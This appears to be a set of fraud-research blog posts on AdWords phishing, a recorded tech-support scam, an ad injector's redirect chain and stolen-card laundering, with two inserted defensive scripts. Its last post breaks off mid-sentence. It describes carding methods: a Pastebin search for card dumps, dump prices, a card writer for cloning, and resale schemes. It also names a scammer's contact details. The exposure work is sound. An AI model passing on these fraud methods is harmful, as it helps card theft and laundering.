A reader sent me an email asking me to clarify the following statement from my last post:

“AdWords credentials are big bucks, more so if you phish a premium account.”

Platforms the likes of AdWords are constantly under attack. It’s astonishingly simple to verify this for yourself:

  • Head on over to google.com
  • Search for “adwords login”
  • Note the first ad

adwords_phishing_1

Inconsistencies with the first ad:

  • Display URL is for www.acefingerprint.com
  • Destination URL is for roofing-contractors-toronto.com

Clicking on the ad will land you here:

adwords_phishing_2

Doesn’t get any easier than that to find someone attacking AdWords. Now remember, an attack on AdWords is an attack on all of the users of AdWords (Google’s advertisers). If Google is at the very least trying to protect their own vertical from abuse (their advertisers), then they’re not doing a very good job at it.

Once an attacker has valid AdWords credentials there are a few ways to monetize:

  1. Sell the account. Forums to sell a compromised account of this nature are in no short supply.
  2. Sell the traffic. The attacker brokers a relationship with someone who wants to buy traffic at a discount rate. This relationship most likely exists before the account was compromised. The attacker can offer huge volumes of traffic at ridiculous prices because the traffic she is selling is stolen (much like buying and selling goods on the black market). The attacker can either modify the keywords of the compromised account to send targeted traffic, or just roll with what the account has anyway and maybe increase the bid price.
  3. Target a specific vertical and launder the traffic. At the end of the day, with a compromised account the attacker has free traffic. If it’s a premium account then the attacker has huge volumes of free traffic. An example of a premium account would be an advertiser who spends $10,000 a day on ads. When you’re dealing with the massive volumes that such a budget will bring, one has only to steer the traffic towards a somewhat probable monetization path and the machine will take care of the rest. For example, the attacker could set herself up as an affiliate in the Payday Loans vertical. The attacker then sets up an AdWords campaign in the Payday Loans vertical and sets her bid price to crush everyone else (it’s not her money, so why play nice?). The attacker funnels traffic from this campaign to a legitimate buffer site which launders the traffic and forwards it on to the merchant facilitating Payday transactions/leads. Some of these will convert, which in turn will pay the attacker.

What’s still somewhat puzzling is why Google is not protecting their own vertical. If an AdWords account is compromised then the advertiser is going to lose money on ads that she did not purchase. If the advertiser loses this money then the advertiser is going to seek a refund. If the advertiser gets the refund then Google is going to lose money. If Google loses money then it’s within their interest to protect this vertical.

Of course, the simplest answer here may be that the cost of protecting this vertical (or any vertical) outweighs the cost of just issuing refunds in the event of a compromise. That’s fine from a pure monetary perspective, but what of the bad press that comes from posts the likes of what we saw on Reddit, or the future revenue lost from an advertiser who has had enough and shifts to an advertising platform that does invest in protecting their own vertical and those of their clients.

This Reddit post discusses an advertiser that is using Google’s AdWords system to phish Blockchain.info subscribers. If you’re not security/tech savvy, what this translates to is that an AdWords advertiser is tricking Google users into thinking that he/she is the face for another legitimate Web site. The idea is to steal user credentials.

As an attacker, using AdWords just makes sense. Why go through all of the effort of organically growing a site to place high up in the organic rankings of Google, or even of compromising an existing site, when Google AdWords will place you right at the top of the results for a small fee per user that they send your way? Using the AdWords system, an attacker can then precisely tune which region they want to target and even what time of day they would like the traffic to come their way.

One of the Reddit users posts

“The fact they allow this is ridiculous.”

Google does not allow this. Note the following from the AdWords Terms and Conditions:

“Ad Serving.  (a) Customer will not provide Ads containing malware, spyware or any other malicious code or knowingly breach or circumvent any Program security measure.”

One could make the argument that Google is just protecting themselves by adding this to their terms and conditions, and nothing more. Once Google has said that you’re not allowed to do this, they can wash their hands of all of it and take only a reactive approach, i.e., shut down an account when enough people complain.

Leaving the argument there is insufficient for it to hold any weight though. The problem with it is that if Google does not proactively search for this nonsense, then Google itself is open to precisely the same form of abuse.

Google AdWords Advertiser Targets Google AdWords

The advertiser highlighted by the red arrow below is phishing Google AdWords customers, using the Google AdWords infrastructure on the Google.com homepage, when searching for “adwords”.

adwords advertiser phishing adwords advertisers

Upon clicking the ad, the user is redirected to the following landing page:

adwordsphishing

Note that this landing page is obviously not the official AdWords landing page. It is an attacker trying to lure unsuspecting victims into handing over their AdWords credentials. AdWords credentials are big bucks, more so if you phish a premium account. The attacker essentially acquires a powerful means with which to print money for himself until the account is closed.

Taking a closer look at the ad, note the inconsistencies:

  • The display URL (in green) is trasterosm2.com
  • The page I landed up at is friendsch.info
  • The destination URL (the first URL that a user is redirected to upon clicking the ad URL) is azmatkhans.com, surely a compromised site that is being exploited as a buffer for the redirect

The trick is that it’s easy to see these inconsistencies in review of an attack, but not in preview of a new AdWords campaign. When this advertiser first set up the campaign, the display URL probably matched the destination URL and in turn the final landing page. With some time, and by sampling users for an attack (selecting 1 out of every 10, for example), the attacker can slowly creep his way into the system, even if Google is proactively searching for this form of abuse.

In the Tech Support scam, a scammer hijacks a well-known brand in an effort to lure a victim, who is then deceived into paying for an unnecessary/non-existent service or installing malware-infected payloads.

This scam has been picked up by quite a few players in the last couple of years, successfully catching people left, right and center. If you want to bring yourself up to speed on how scammers have evolved in this space, you’ll find lots of documentation from the FTC, the Malwarebytes team and Microsoft.

When I think about a scam, of course the first question I ask is who is the victim, and eventually it’s interesting to figure out how the money flows. In today’s example, I’ll show you how a Tech Support scam flows from beginning to end. We’ll discuss who the victims are and we will examine the players that make money from all of this.

So with a couple of cell phones, a few false names and an intentionally flawed Virtual Machine (one which had not been activated) I decided to see what Tech Support scams looked like for myself.

The reason I chose a VM which had not yet been activated is because I wanted to see if the people I phoned for tech support pointed out the most obvious potential problem with the machine, i.e., that it had not yet been activated.

Online Advertising

On Friday the 23rd of May 2014, I found this Google advertiser:

google_advertiser_5_23

It looks like he has an advertising campaign that is constantly running and targeting folks who are looking to log into their RoadRunner email:

5/23 – Google Advertiser URL leads to http://rrlogg.in/Log_In.htm
5/23 – Google Advertiser URL leads to http://rrhelp.in/Log_In.htm
5/24 – Google Advertiser URL leads to http://rrlogg.in/Log_In.htm
5/27 – Google Advertiser URL leads to http://www.rrlgn.in/Log_In_To_Account.htm

For each of these ads, the landing page will display the following message:

“Attention: Your Account Has Been Disabled Please Call 1-855-666-8849”

google_advertiser_tech_support_scam_0

It’s obvious what is happening here, but to be clear: this advertiser has hijacked the TWC Road Runner login page and is trying to deceive the user into thinking that there is a problem.

Depending on what your referrer to this page is (the site responsible for sending you here), the message could also be:

“Attention User Account Is Under Review Please Call RoadRunner Support 1-800-463-6338”

That the message/number changes matters not, for the intent remains the same: deception. In each case the advertiser has hijacked the TWC RoadRunner page and is trying to con the user into phoning the falsified tech support line.

What I thought was really interesting here is that they are not even bothering to steal credentials; they just want you to call in and fall victim to a quick scam that will send real dollars their way. Re the pic below, note that I entered false credentials and then pushed Login. Upon analyzing a packet trace for this activity, I found no evidence of credentials being sent to a server.

google_advertiser_tech_support_1

Error code: RR-D68547 Your Email Account Has Been Temporary Suspended Due to Suspicious Activity Detected. Please RoadRunner Support on +1-800-463-6338

Not stealing credentials actually makes a whole lot of sense if you think about it a little. If they were stealing usernames and passwords then this would be an open and shut case. It would not take much for chaps like me to gather evidence against players that steal credentials in this manner, in which case they could land themselves in hot water pretty quickly.

Moving on, I called the guys behind 1-855-666-8849 a few times and each time I phoned they always answered with “Thank you for calling <GARBLED> technical support”. The <GARBLED> part is intentional from their side, they want you to think it’s your fault you did not hear them properly. Sometimes I asked what technical support they were, but I never got an answer.


Download audio

Unfortunately my initial attempts to get to the bottom of the scam didn’t get me very far. I think I came across as unconvincing, someone who may be a threat to their scam and so each time they ended up putting the phone down on me. Upon reflection, I think my problem was that I assumed that they were trying to sell me an antivirus solution from the get go, so my guess is this is what kept throwing them off. They would always tell me my computer was broken/compromised, that things had gone wrong and they needed to access it. They never told me how to facilitate this, I told them I had no idea what they were talking about and kept waiting for them to take the lead.

As I kept trying to see what this particular tech support scam was all about, it became evident to me that where other scammers were trying to get folks to download and install something, these guys were up to something different.

So I involved a senior citizen (my dad!), someone who I figured was the real target of their scam.

The result was quite different.

Download Audio

Highlights of the call:

04:50 scammers convince my father to let them take control of the machine. They ask him to load logmein123.com, this redirects to secure.logmeinrescue.com where they then ask him to enter the code 24227

logmein123

07:10 My father asks who they are, he clearly says “Are you TWC?” This is followed by a moment of silence and then their response “Yeah”

09:39 They have taken control of the machine, they then ask my father to log into his email so they can see the problem. What they did here was really sneaky. As he was typing in the password, they would keep pushing the caps lock key on their side, which meant that even if we were at the right service URL typing in the right credentials, it would be entered incorrectly and our login would be denied. This would open the doors for the scammers to prove that there certainly was a problem.

scammers 2

10:28 you can hear my father tapping the keyboard five times for a five character password and counting silently to himself. Mysteriously, a sixth character appears in the password prompt. Obviously scammers are entering the final character to keep forcing incorrect credentials.

scammers 4

11:30 scammer opens a command line window and types “EMAIL HAS BEEN HACKED”. My dad falls for this and starts to panic, when my father asks if his email has been hacked the scammer says “Yeah, that’s the problem sir, yeah”

scammers 5

13:58 scammer says “don’t worry, I am here to help you” whilst trying to scare my father by showing him logs from the Windows event log, all of which is completely normal

18:52 “are you a senior citizen sir?”

“Yes mam I am 76″

19:22 my father asks “are these experts from Microsoft?” to which the scammer responds “yes sir”

20:00 scammer explains to my father the difference between what Bestbuy’s Geek Squad offers and what they are offering. It’s all so confusing, but it’s supposed to be a good deal. Note the question my father asks at 20:50

“And these are specialized technicians from Microsoft, Yes”

“Yes”

scammers 6

scammers 7

21:56 scammer loads up secure.nmi.com and logs in with merchant id “ishan.865tasu”

scammer 8

scammer 10

For the first time we are privy to what their real identity may be, or at least what they are using to transfer funds: “International Technical Support Corporation”. If you’re following this call carefully, you know that the scammer just made a mistake on their side. They just logged my father directly into their merchant account; obviously they don’t know that I just fell off the chair next to him.

22:50 They enter the Order ID ITSC102504 and will try to convince my father to complete the form with his details. Note the question my father asks before trying to complete the form

“Do you have special rates for over the age of 75?”

scammer 12

23:38 My father asks if he can spend the $599 over a period of time instead of one large payment. He explains that $600 is his rent for the month. They know he is an elderly gentleman, they know they are exploiting his trust. They know they are about to steal money that he cannot spare. What’s sad here is that my father is not a victim, but they don’t know that. How many elderly people have potentially fallen for this scam? We’re about to answer that question thanks to these guys logging us into their merchant account.

26:18 scammer shares their address: “1113 6th ave, New Hyde Park, NY 11040”

31:00 scammer becomes impatient after we click refresh, nullifying everything we had spent the last ten minutes completing. She decides to transfer us to another scammer, but we decide to end her remote session and take a closer look at their merchant account.

Of interest to me at that point in time is how much money these unscrupulous individuals have made thus far. I used the Quickbooks feature of the merchant panel to get a quick idea.

scammer 13

Just to be clear here, for this account alone the scammers have conned 1538 people with this scam. At a total of $439,254.91, they are averaging $258 per person. What’s more terrifying here is the extremely low 3% rate of chargebacks/reversals. These are people that were savvy enough to see the scam and then demand a refund from their credit card company.

I shouldn’t have to say that this practice is unscrupulous. These are without a doubt scammers of the lowest possible order, bottom feeders that target old people and those that are not tech savvy enough to know any better.

The Players

1. Google facilitates the first part of this scam by allowing advertisers of this ilk onto their network. Average users, old people, kids, moms, tech elites, you name it, they trust the results given to them from a search engine. So why shouldn’t they trust what the page behind that first click tells them: “Attention: Your Account Has Been Disabled Please Call 1-855-666-8849”. After all, there’s no warning on the search result page saying “Hey be careful of these advertisers, we have no idea who they are or what they are going to try to sell you!”

Obviously the scammers know how trust is delegated here, so they will pay Google to exploit this as an advertiser for as long as they are allowed to do so.

But is Google a victim? Sure. Whilst they are taking the scammers money to show the ads in question, they are also indirectly a victim. Fingers will point to services the likes of theirs when one tracks back the scam to its origin.

2. NMI.COM – Network Merchants LLC, for a fee I presume, is allowing the money to flow from the target of the scam (my senior citizen dad in this case) through to the scammers. At the end of the day what the scammers are doing here is wire fraud, plain and simple. So if NMI didn’t know about the half million dollars these scammers potentially defrauded from victims before, they sure know about it now.

3. TWC Road Runner. They’re another victim. It’s their service that is being hijacked and their users plundered. Ultimately victims are dialing the support number listed because they thought TWC Road Runner disabled their account.

4. Microsoft. The scammers are using legitimate programs on a Microsoft Operating System to make the victims think something is wrong with Microsoft software. We know that it’s all just a lie though, the event viewer is filled with legitimate warnings and errors. Typing “EMAIL HAS BEEN HACKED” in a command prompt does not mean that your email is hacked.

Furthermore, they hijack the Microsoft brand by saying that they are from Microsoft. Recall 19:22 where my father asks “are these experts from Microsoft?”

“yes sir”

5. The scammers themselves. From the Google ad landing pages, we know of three domains that they are using: rrlogg.in, rrlgn.in and rrhelp.in. Whois pages for these (here, here and here) list Dayanad Colony as the registrant using the number +91.9818290300 and email address karangosain2007@gmail.com

So what now?

Why are unscrupulous advertisers of this ilk allowed to run rampant? How is it that they can get away with something like this over and over again? Why aren’t the players responsible for playing a part in all of this (knowingly or unknowingly) made accountable here?

There’s no shortage of articles on bad guys like this [1,2,3,4] and from the merchant account above it’s obvious that these guys are profitable, so what gives?

The bottom line is that it’s the innocent consumers that are being nailed over and over again. Hard legal action coming in on the tail end of these scams is just not going to solve anything. In my mind I see the need for a very big and very angry gorilla stepping into the arena of online advertising sometime soon, and its name is regulation.

Updates

* 5/29/2014 – download links to the audio added *

* 6/3/2014 – scammer is still running strong through AdWords (Advertiser URL), now using the domain rrloginin.in and the number 1-855-808-1175 *

Search for “download skype”, “download google chrome”, “download firefox” or a myriad of other popular applications and you may find yourself unlucky enough to run into an ad injector.

Now an ad injector won’t present itself as an ad injector. Typically, it will bundle itself into an installer which will opt the user into installing a handful of programs onto her machine in addition to what she was originally looking for.

Sure, technical elites out there have no problem picking up on the subtle clues from an installer that an ad injector lies in waiting (maybe they read the entire license agreement sometimes pointed to at the bottom of the screen), but less tech savvy folks think they are only getting what they were searching for. Nothing less, and arguably most important: nothing more.

Obviously, that’s not the case in today’s example, as we discuss an ad injector making the rounds and going by the name of Bee Coupons.

In the images below, with Bee Coupons installed courtesy of an installer on what was originally an uncompromised machine, I searched for “click fraud” on google.com. Google comes back with its responsive UI and I see exactly what I was expecting less than a second after pushing enter:

ad injectors and affiliate fraud may be good for business, but who's?

Unfortunately, whilst Google was fetching its response to the “click fraud” query, Bee Coupons software was getting a result of its own. A few seconds pass and Bee Coupons decides to “enhance” Google’s search result with their own addition:

clickety clicky, kechang!

Of course the “enhanced results” aren’t really enhanced results at all, they’re ads. Upon clicking on those ads an advertiser will be charged a fee. The advertisers involved in this particular transaction are zoosk.com and ask.com. They may or may not be willing participants in this, for the online advertising ecosystem is fraught with so many complexities and third parties, that unless you sit and dissect a packet trace from start to finish every single time, it’s difficult to conclusively say who is who. Nonetheless, the odds are that Zoosk and Ask will be charged a fee upon a click.

But then where does the money go?

Good question, ordinarily the money would go to Google. You see, that’s how they fund the largest search engine on the planet, with ads from their own advertising network. More often than not they have a direct relationship with the advertiser. When Google is the publisher of an ad and the advertising network as well then they collect 100% of the fee. There are instances where Google is not the publisher of the ad, but facilitates delivery of the ad through their ad network, in which case Google still collects a fee from the advertiser, a portion of which is then given to the publisher.

I’m confused, how does Google make money here?

Google does not make money here, for whilst they are the publisher in this example they will not be paid upon someone clicking on the Zoosk or Ask ads. This is because those are ads that were not put there by Google. The ads belong to an entirely different advertising network that has hijacked the Google Search Result Page and inserted their own means of generating revenue.

Now the first rebuttal offered from an ad injector is that they received the permission of the user operating the computer in question to do this. Whilst this statement may be true (assuming the operator was not a child — popular target of installers), it’s inconsequential for they did not receive permission from the entity that mattered: the real publisher of the content, i.e., Google.

So to be clear, again, the ads that have been injected into Google’s site do not belong to Google.

So who do they belong to?

I clicked on the little “i” next to “Ads by Bee Coupons” and was directed to a page on advertising-support.com that offered to explain why I was seeing the ads in question:

You may be seeing ads as part of our advertising solution for Internet properties (such as websites or web browser extensions). This solution provides content at no cost to you and displays advertisements during your web browsing experience. It was installed by you, or someone using your computer.

“at no cost to you” is highlighted because this statement cannot always be true. If you are the publisher of content on the Web (say Google, for example) and Bee Coupons comes along and pushes your top advertisers down (who bid good money to be there) in order to make room for Bee Coupon’s advertisers, then there may indeed be a cost to you. The user that clicked on Bee Coupon’s ads did not click on your ads, which is ultimately money that should have been sent your way. Not earning when you could have is most definitely a cost and if you were Google in our example above then you shall bear the brunt of it.

What’s more interesting here is that the “advertising solution” installed on the machine (Bee Coupons in my case) is not available for download from advertising-support.com. In fact, I could not find any advertising solution software at all, and that’s where the installers come in.

Advertising-support.com

It’s worth spending a few more moments looking at advertising-support.com:

Revenue Skyrockets with Solutions from Advertising Support!

Solutions that are divided up into two categories, advertisers and publishers.

bee_coupons_click_fraud_3

For advertisers:

advertising-support says: Competitive Rates
iPensatori comments: This is the very reason why ad injectors exist at all, they offer competitive pricing. Instead of playing ball with the rest of the industry on advertising networks with established prices and that have permission to place their ads on a publisher’s site, advertisers enjoy better placements on premium publisher properties at lower rates with ad injectors.

advertising-support says: Traffic in all countries
iPensatori comments: Welcome to the Internet.

advertising-support says: High quality traffic
iPensatori comments: It most certainly is. This is why advertisers pay the big bucks to be in the #1 spot on Google.

For publishers:

advertising-support says: Very easy to implement
iPensatori comments: One can’t help but wonder which publishers they are talking about here. It’s certainly not the publisher of the content (Google in our example), although if they were then it is pretty easy to implement: Google did nothing.

advertising-support says: Non-Intrusive to users
iPensatori comments: No comment.

advertising-support says: Maximized Earnings
iPensatori comments: ?

Other Publishers Receiving Enhanced Ads

Google is not the only target of Bee Coupons. In order to satisfy the claims made above they have to inject ads into a number of top quality publishers. I captured a few samples below.

Twitter

bee_coupons_click_fraud_6

Msn

bee_coupons_click_fraud_5

Youtube

bee_coupons_click_fraud_7

WordPress

bee_coupons_click_fraud_8

Yahoo

bee_coupons_click_fraud_9

Enter the Affiliate

Affiliates are masters of marketing, which makes sense and in a way justifies the whole industry. A small company that is really good at putting together trips to the Amazon jungle may not know the ins and outs of online marketing, or even care to know it since their specialty is trips to the Amazon jungle so why concentrate on anything other than improving this service. As a result it is well within their interest to offload the marketing portion of their business onto affiliates in return for cutting them in on a slice of the pie when there is a sale. How wonderful!

Wonderful, that is, until a rogue affiliate enters the picture.

bee_coupons_click_fraud_4

This packet trace steps us through the chain of events that happened behind the scenes upon clicking on the first Amazon advertiser provided by Bee Coupons:

  • Our adventure begins with s.txtsrving.info: a GET request with no referrer header (the referrer identifies the entity responsible for the traffic, usually the publisher) returns Javascript that creates an element in the DOM and clicks on it. There are many reasons for doing this, one of which is to pick up a brand new referrer.
  • The automated click from the JS above results in a GET request to 123srv.com with the referrer header now set to s.txtsrving.info. The response here includes JS which redirects the browser to another script on 123srv.com.
  • The response from 123srv.com redirects to advjmp.com, which uses JS to redirect to Amazon via an Amazon affiliate link.

The net effect is that one of Amazon’s affiliates (affiliate id advertiseco0e-20) basically outbid Amazon (with probably less money, thanks to the injector) for the top spot on Google when searching for Amazon. If the user searching for Amazon clicks on this ad and then buys something from Amazon within a certain period of time (say 24 hours), then the affiliate responsible for purchasing the ad from the injector will be paid a commission.
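Both chains in this blog (the AdWords phish whose display URL, destination URL and landing page all disagreed, and the Bee Coupons trace above that launders the referrer on its way to an Amazon affiliate link) come down to the same review exercise: write down every hop the browser made and check it against what the ad claimed. The script below is an added example, not code from the original posts. It reconstructs such a chain from a list of hops and flags the display/landing mismatch, the referrer-laundering step, the script-driven redirects and the affiliate id. The two hop lists are constructed from the hosts named in the posts; the paths, Referer values, redirect mechanisms and the use of Amazon’s `tag=` query parameter for the affiliate id are assumptions made for the illustration.

```python
"""Reconstruct a click-through chain and flag the inconsistencies the posts
describe.  Added example, not code from the original posts: the hop lists
below are constructed from the hosts named in the text, but the paths, the
Referer values, the redirect mechanisms and the use of Amazon's "tag=" query
parameter for the affiliate id are assumptions made for the illustration.
"""
from urllib.parse import parse_qs, urlsplit


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def registrable(host):
    # Crude "registrable domain": the last two labels.  Adequate for the
    # sample hosts here; a real tool would consult the Public Suffix List.
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def analyse_chain(display_url, hops, affiliate_param="tag"):
    """hops: (url, referer_or_None, mechanism) tuples in the order the browser
    requested them, ending at the landing page.  mechanism is "click",
    "http302" or "js" (script-created element clicked / location change)."""
    findings = []
    final_url = hops[-1][0]

    # 1. The display URL in the ad should match where the user ends up.
    if registrable(host_of(display_url)) != registrable(host_of(final_url)):
        findings.append("display/landing mismatch: %s -> %s"
                        % (host_of(display_url), host_of(final_url)))

    # 2. Referrer laundering: a hop made with no Referer, after which the
    #    next hop carries a Referer pointing at that intermediate, so the
    #    site receiving the traffic can no longer see its true origin.
    for (prev_url, prev_ref, _), (url, ref, _) in zip(hops, hops[1:]):
        if prev_ref is None and ref and \
                registrable(host_of(ref)) == registrable(host_of(prev_url)):
            findings.append("referrer laundering: %s receives Referer %s, "
                            "true origin hidden" % (host_of(url), host_of(ref)))

    # 3. Script-driven redirects are worth listing: a reviewer who only
    #    follows HTTP status codes never sees them.
    js_hops = [host_of(u) for u, _, m in hops if m == "js"]
    if js_hops:
        findings.append("script-driven redirects via: " + ", ".join(js_hops))

    # 4. An affiliate id on the landing URL tells you who gets paid.
    affiliate = parse_qs(urlsplit(final_url).query).get(affiliate_param, [None])[0]
    if affiliate:
        findings.append("affiliate id on landing URL: " + affiliate)

    return {
        "final_host": host_of(final_url),
        "hop_count": len(hops),
        "intermediate_domains": sorted({registrable(host_of(u)) for u, _, _ in hops[:-1]}),
        "affiliate_id": affiliate,
        "findings": findings,
    }


# Constructed from the AdWords phishing ad described in the post: display URL
# trasterosm2.com, first redirect through azmatkhans.com, landing on
# friendsch.info.  Paths, Referer values and the 302 are assumptions.
ADWORDS_PHISH_CHAIN = ("http://trasterosm2.com/", [
    ("http://azmatkhans.com/", "https://www.google.com/", "click"),
    ("http://friendsch.info/", "http://azmatkhans.com/", "http302"),
])

# Constructed from the Bee Coupons packet trace: txtsrving -> 123srv ->
# 123srv -> advjmp -> Amazon affiliate link.  Paths and Referer values are
# assumptions; the affiliate id is the one named in the post.
INJECTOR_CHAIN = ("http://www.amazon.com/", [
    ("http://s.txtsrving.info/click?id=1", None, "click"),
    ("http://123srv.com/a.js", "http://s.txtsrving.info/click?id=1", "js"),
    ("http://123srv.com/b.js", "http://123srv.com/a.js", "js"),
    ("http://advjmp.com/go", "http://123srv.com/b.js", "js"),
    ("https://www.amazon.com/?tag=advertiseco0e-20", "http://advjmp.com/go", "js"),
])

if __name__ == "__main__":
    for name, chain in (("AdWords phish", ADWORDS_PHISH_CHAIN), ("Bee Coupons", INJECTOR_CHAIN)):
        report = analyse_chain(*chain)
        print(name, "->", report["final_host"], "in", report["hop_count"], "hops")
        for f in report["findings"]:
            print("  -", f)
```

The phishing chain produces a single finding (the display host never matches the landing host), while the injector chain produces no mismatch at all, because the user really does end up on Amazon; what gives it away is the laundered referrer, the run of script-only redirects and the affiliate id on the final URL. That is why a review that only compares display URL to landing page catches the first case and misses the second.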

Amazon may allow this behavior, but it seems unlikely that they do. Some simple reasons why not:

  1. Ultimately Amazon will be paying a commission on traffic that they would have received anyway, for not only were they the first ad displayed before the injector arrived, but they were the first organic link displayed as well
  2. This practice is awfully unfair to the honest Amazon affiliates out there that don’t know about ad injectors, since their cookies will be overwritten by the affiliate using the ad injector.

I’ve spent the last few years presenting at a number of affiliate conferences, meeting and shaking hands with affiliates in person, people who make affiliate marketing their primary means of making ends meet. They don’t know how to broker relationships with questionable traffic sources. They’re not programmers. They have never heard of practices the likes of referrer laundering, blackhat marketing, cookie-stuffing or pay per view marketing and they most certainly don’t know the ins and outs of ad injectors.

So if you’re an honest Amazon affiliate competing for the same traffic that this ad injector is sending to Amazon affiliate advertiseco0e-20, know this: you don’t stand a chance.

Fraudster on the roof

This post is the second entry in the “Fraudster on the Roof” series. Please remember that the intention of this series is for readers to learn how to better detect fraud, not to improve how they implement it.

Today we look at what it takes to launder money online, specifically through stolen credit cards.

Cards

I spend a lot of time thinking about the underground economy. What’s always fascinating to me is that the Web seems to provide a false sense of security to scammers who feel nothing flaunting their illegal services in full view of authorities and anyone that really cares to take a look.

Pastebin.com is a surprising resource here. Point your browser to your favorite search engine and type in the following query:

“cvv site:pastebin.com”

The thousands of results returned include scammers that are selling everything from card data to bank logins, botnets, paypal accounts and complete online identities.

On stolen credit cards, the price per market and card type averages out to the following:

Market          Card type           Average price
United States   American Express    $7.00
United States   Discover            $8.00
United States   Visa & Mastercard   $4.50
Europe          American Express    $12.50
Europe          Discover            $18.00
Europe          Visa & Mastercard   $14.50
Asia            American Express    $18.00
Asia            Discover            $18.00
Asia            Visa & Mastercard   $15.00

From my own reading here, it looks like prices double on average when the card is sold with information on the person that the card belonged to (address, name et cetera).

As I scroll through the services listed on Pastebin, I think about what buyers do with this data and how they really make any serious money. All too often does one hear about ‘data breach here’ and ‘millions of accounts compromised there’ but how does this equate to scammers making money? I’m not talking about scammers that sell the data card by card, I am referring to the scammers that buy it.

Perhaps the simple answer is that with a stolen credit card one could go buy a whole bunch of items from an online market and then resell them. But where would one deliver the goods from the initial purchase to? An entry level scammer may interrupt now and say that you don’t deliver it to yourself, because the goal is to launder the card as quick as you can and make a clean getaway. One way to do this is sell items at a discount on online market A, once these sell then you buy the product through online market B with the stolen card and ship to the buyer from market A. Easy.

It’s a simple scam, but scammers are lazy and this sounds like too much work, mostly in the sense that it takes so long to make it all happen. Money would only trickle in slowly, and by the time it amounts to any meaningful income the account on A could be closed at any moment (the buyer reports the seller after the cops come knocking).

Higher earnings can be found by mixing the offline and online world, where scammers take more risk by doing things in person but stand to make greater profit over fewer transactions. To make things happen in the offline world, scammers push the stolen card data they bought online onto a physical card that can be swiped offline.

Admittedly I am not an expert in offline credit card fraud (or its detection), but from what I have read it’s surprisingly easy to get up to speed here. A few searches on eBay for the model number of a card writer ("MSR605") yield a list of auctions with card writers that are ready to roll for less than $150.

Screenshots: eBay listings for MSR605 card writers.

Note that the software provided with the writer facilitates pushing track 1/2/3 data onto a physical card. Track 1/2/3 is the credit card data for sale on the underground economy; it is what is stored on the magnetic stripe of your card.

Screenshot: credit card Track 2 data.

A scammer printing his own cards can then purchase fairly expensive and hard-to-track items (jewelry) from offline stores, which can then be sold at a discounted rate online. Since the scammer paid nothing for the items, his profit is a function of the resources allocated to buying from offline stores and the effort required to sell online. The disconnect between offline and online, together with buying only hard-to-track items, mitigates the risk of the scammer’s online sales account being reported and his efforts going to waste.
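As an added example (not code from the original post), here is the check a practitioner would run over a suspected dump, whether a Pastebin result from the search above or a file destined for a writer like the MSR605: find Track 1 and Track 2 formatted records in free text, confirm the PAN passes the Luhn check, decode the expiry and service code, and report the PAN masked. The paste is constructed and the card numbers are published test numbers, not real accounts.

```javascript
// Added example, not code from the original post. Scans text for magnetic-stripe
// Track 1 / Track 2 records, validates the PAN with the Luhn check, and returns
// masked findings. SAMPLE_PASTE is constructed; the PANs are public test
// numbers (4111..., 5555...), not real accounts.

// Track 1: %B<PAN>^<SURNAME/FIRST>^<YYMM><service code><discretionary>?
// Track 2: ;<PAN>=<YYMM><service code><discretionary>?
const TRACK1_RE = /%B(\d{13,19})\^([^^]{2,26})\^(\d{4})(\d{3})([^?]*)\?/g;
const TRACK2_RE = /;(\d{13,19})=(\d{4})(\d{3})([^?]*)\?/g;

// Luhn mod-10 check digit test, as used on card PANs.
function luhnValid(pan) {
  let sum = 0;
  let double = false;
  for (let i = pan.length - 1; i >= 0; i--) {
    let d = pan.charCodeAt(i) - 48;
    if (double) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// Keep the BIN (first 6) and last 4 so a finding can be reported without
// storing the full PAN.
function maskPan(pan) {
  return pan.slice(0, 6) + '*'.repeat(pan.length - 10) + pan.slice(-4);
}

// Service code first digit 2 or 6 means a chip (IC) should be used where the
// terminal supports it, so a magstripe clone of such a card is more likely to
// be pushed to chip or declined at an EMV terminal.
function describeServiceCode(code) {
  return { code, chipPreferred: code[0] === '2' || code[0] === '6' };
}

function expiryFromYYMM(yymm) {
  return '20' + yymm.slice(0, 2) + '-' + yymm.slice(2);
}

function findTrackData(text) {
  const hits = [];
  for (const m of text.matchAll(TRACK1_RE)) {
    hits.push({ track: 1, pan: maskPan(m[1]), luhnOk: luhnValid(m[1]),
      name: m[2], expiry: expiryFromYYMM(m[3]), service: describeServiceCode(m[4]) });
  }
  for (const m of text.matchAll(TRACK2_RE)) {
    hits.push({ track: 2, pan: maskPan(m[1]), luhnOk: luhnValid(m[1]),
      expiry: expiryFromYYMM(m[2]), service: describeServiceCode(m[3]) });
  }
  return hits;
}

// Constructed paste in the style of the dumps the search above turns up.
const SAMPLE_PASTE = [
  'fresh dumps, t1+t2, usa visa/mc 4.50 each',
  '%B4111111111111111^DOE/JOHN^25121010000000000?',
  ';5555555555554444=2512201123456789?',
  ';4111111111111112=2512101000000000?   <- mistyped in the dump, fails Luhn',
].join('\n');

console.log(JSON.stringify(findTrackData(SAMPLE_PASTE), null, 2));
```

A Luhn failure on a record is worth reporting rather than dropping: sellers pad dumps with invalid or already-dead numbers, and the ratio of valid to invalid records is one of the few quality signals available without touching an issuer.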

As mentioned earlier, there’s a fair amount more risk involved in this scam, in the sense of getting caught and going to jail. Moving the scam offline obviously means that the scammer has to participate in the physical world, bound by the same laws as the people he is stealing from. A savvy jewelry clerk could smell a bad deal and call the cops while stalling the scammer. A card could have been reported stolen between purchasing the data and printing it onto a card, prompting a call to the card issuer when the card is swiped.

“keep him busy, cops are on the way”

There’s just too much risk here.

Any competent scammer looking to make real money wouldn’t like this scam, so would either contract this work out (less risk, less reward) or stay away from it completely.

So where to next?

Hustle and Flow

Let’s take a moment to appreciate the relationship of each of the players involved in the scam that we have discussed thus far:

scammer hustle and flow

  • Scammer – deals with the Market and the Merchant. Has a stolen credit card and intends to use it to steal as much cash as possible (and still make a clean getaway)
  • Market – scammer will foster a relationship with the market in order to sell goods to a buyer
  • Merchant – sells goods/services to consumers. The scammer buys goods using a stolen credit card and sells them at a discounted price to a buyer through the market. The merchant can also be the market
  • Buyer – the party on the other side of the transaction facilitated by the market

If there ever was a conference where all the fraudsters sat down and discussed their strategies, then at one time or another a more strategic fraudster might present his thoughts on the weakest links in the ecosystem:

